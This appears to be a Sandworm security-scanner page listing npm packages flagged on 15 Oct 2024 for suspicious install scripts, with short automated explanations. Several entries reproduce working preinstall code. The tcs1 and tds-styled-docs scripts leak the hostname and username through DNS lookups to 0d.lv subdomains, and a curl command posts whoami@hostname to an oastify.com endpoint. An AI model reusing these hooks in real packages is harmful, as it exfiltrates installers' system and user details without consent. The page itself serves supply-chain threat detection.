Sandworm scans all new Npm package versions for malicious install scripts.
Scanning since October 2024.
Detected: 15 Oct 2024
Affected Install Script: preinstall
Package Source: View on Npm
The code constructs a token that includes sensitive information such as the package name, version, hostname, and username. It then performs a DNS lookup using this token as a subdomain; the query reaches the authoritative name server for that domain even though no HTTP connection is made, so the sensitive information is exposed to an external server, creating a risk of data leakage and privacy violations.
Install script: node index.js
Install script code:
const os = require("os");
const dns = require("dns");
const package_name = "tcs1";
const package_version = "7";
function version() {
  console.log(package_name + " v" + package_version);
}
// Read the name of the project being installed; npm sets npm_package_name during install.
var pjson = require('./package.json');
var name = pjson.name;
try {
  name = process.env.npm_package_name != undefined ? process.env.npm_package_name : name;
} catch { }
// Token: package, version, installing project, hostname and username, joined with "--".
var token = package_name + "--" + package_version + "--" + name + "--" + os.hostname() + "--" + os.userInfo().username;
// Replace anything that is not a valid hostname character so the token can be used as a DNS label.
token = token.replaceAll(/[^a-zA-Z0-9\-]/g, '_');
// The DNS query itself carries the token to the name server for dc.0d.lv; the result is ignored.
dns.lookup(token + ".dc.0d.lv", () => { });
module.exports = version;
Detected: 15 Oct 2024
Affected Install Script: preinstall
Package Source: View on Npm
This code constructs a token that includes sensitive information such as the hostname and the username of the current user, and performs a DNS lookup using this token. If an attacker controls the domain being queried, they could potentially collect and exploit this sensitive information, leading to privacy breaches or further attacks.
Install script: node index.js
Install script code:
const os = require("os");
const dns = require("dns");
const package_name = "tcs1";
const package_version = "6";
function version() {
  console.log(package_name + " v" + package_version);
}
// Read the package name; the value assigned from npm_package_name is not used below.
var pjson = require('./package.json');
var name = pjson.name;
try {
  name = process.env.npm_package_name;
} catch { }
// Token: package, version, package.json name, hostname and username, joined with "--".
var token = package_name + "--" + package_version + "--" + pjson.name + "--" + os.hostname() + "--" + os.userInfo().username;
// Replace anything that is not a valid hostname character so the token can be used as a DNS label.
token = token.replaceAll(/[^a-zA-Z0-9\-]/g, '_');
// The DNS query itself carries the token to the name server for dc.0d.lv; the result is ignored.
dns.lookup(token + ".dc.0d.lv", () => { });
module.exports = version;
Detected: 15 Oct 2024
Affected Install Script: preinstall
Package Source: View on Npm
The code constructs a token containing sensitive information (package name, version, hostname, and username) and attempts to perform a DNS lookup based on this token, potentially leaking this information to an external server. This can expose user data and system information to malicious actors, thereby posing a security risk.
Install script: node index.js
Install script code:
const package_name = "tds-styled-docs";
const package_version = "68.0.2";
const os = require("os");
const dns = require("dns");
function version() {
  console.log(package_name + " v" + package_version);
}
// Token: package, version, hostname and username, joined with "-".
const token = package_name + "-" + package_version + "-" + os.hostname() + "-" + os.userInfo().username;
// Hex-encode the token so it is a valid DNS label, then leak it in a query to depconf.0d.lv; the result is ignored.
dns.lookup(Buffer.from(token).toString('hex') + ".depconf.0d.lv", (err, address, family) => { });
module.exports = version;
Detected: 15 Oct 2024
Affected Install Script: preinstall
Package Source: View on Npm
The code constructs a token using sensitive information (package name, version, hostname, and username) and then performs a DNS lookup using this potentially sensitive token encoded in Base64URL format. This could expose the token to external DNS servers, which may lead to information leakage about the system and its user.
Install script: node index.js
Install script code:
const package_name = "tds-styled-docs";
const package_version = "68.0.1";
const os = require("os");
const dns = require("dns");
function version() {
  console.log(package_name + " v" + package_version);
}
// Token: package, version, hostname and username, joined with "-".
const token = package_name + "-" + package_version + "-" + os.hostname() + "-" + os.userInfo().username;
// Base64url-encode the token (no "+", "/" or "=" characters) so it is a valid DNS label,
// then leak it in a query to depconf.0d.lv; the result is ignored.
dns.lookup(Buffer.from(token).toString('base64url') + ".depconf.0d.lv", (err, address, family) => { });
module.exports = version;
Detected: 15 Oct 2024
Affected Install Script: postinstall
Package Source: View on Npm
This script uses the Homebrew package manager to install idb-companion, a tool from the Facebook iOS development ecosystem, and cliclick, which can simulate mouse clicks and keyboard events. The pipx command then installs fb-idb, a command-line tool for iOS development. Together these tools could allow automated control of a system's inputs and outputs, which raises concerns about unauthorized access or malicious activity.
Install script: brew install facebook/fb/idb-companion cliclick pipx && pipx install fb-idb
Detected: 15 Oct 2024
Affected Install Script: postinstall
Package Source: View on Npm
This script installs idb-companion from Facebook's repository using Homebrew, which could include harmful code, and also uses pipx to install fb-idb, a package that might perform unauthorized actions or collect sensitive information.
Install script: brew install facebook/fb/idb-companion cliclick pipx && pipx install fb-idb
Detected: 15 Oct 2024
Affected Install Script: postinstall
Package Source: View on Npm
This script installs packages using Homebrew and pipx; each of these commands can download and execute code from external sources, allowing unauthorized access to or modification of the system.
Install script: brew install facebook/fb/idb-companion cliclick pipx && pipx install fb-idb
Detected: 15 Oct 2024
Affected Install Script: preinstall
Package Source: View on Npm
This script sends the current user's username and hostname encoded in base64 to a remote server. It is dangerous because it potentially exposes sensitive information without the user's consent, and it communicates with an external endpoint which could be controlled by an attacker.
Install script: curl --data-urlencode "info=$echo "$(whoami)@$(hostname)" | base64" http://7owpmbrds5kmvxdil4zrg7a3nutlhi57.oastify.com/aspera-ui
Detected: 15 Oct 2024
Affected Install Script: postinstall
Package Source: View on Npm
This code downloads and executes a file selected by an environment variable, which allows arbitrary code execution if the downloaded content is malicious. If the script runs in an environment where the environment variables (RUNME_DOWNLOAD_ON_INSTALL and RUNME_VERSION) can be manipulated, it may lead to the execution of untrusted code.
Install script: node ./postInstall.js
Install script code:
import fs from 'node:fs/promises'
// Check whether the compiled ./dist directory exists (ES module with top-level await).
const isCompiled = await fs.access('./dist').then(() => true, () => false)
// Only download when the build output is present and the opt-in environment variable is set.
if (isCompiled && process.env.RUNME_DOWNLOAD_ON_INSTALL) {
  const { download } = await import('./dist/installer.js')
  // The version to fetch is taken from the environment, defaulting to 'latest'.
  const version = process.env.RUNME_VERSION || 'latest'
  console.log(`Download Runme ${version}`)
  await download(version)
}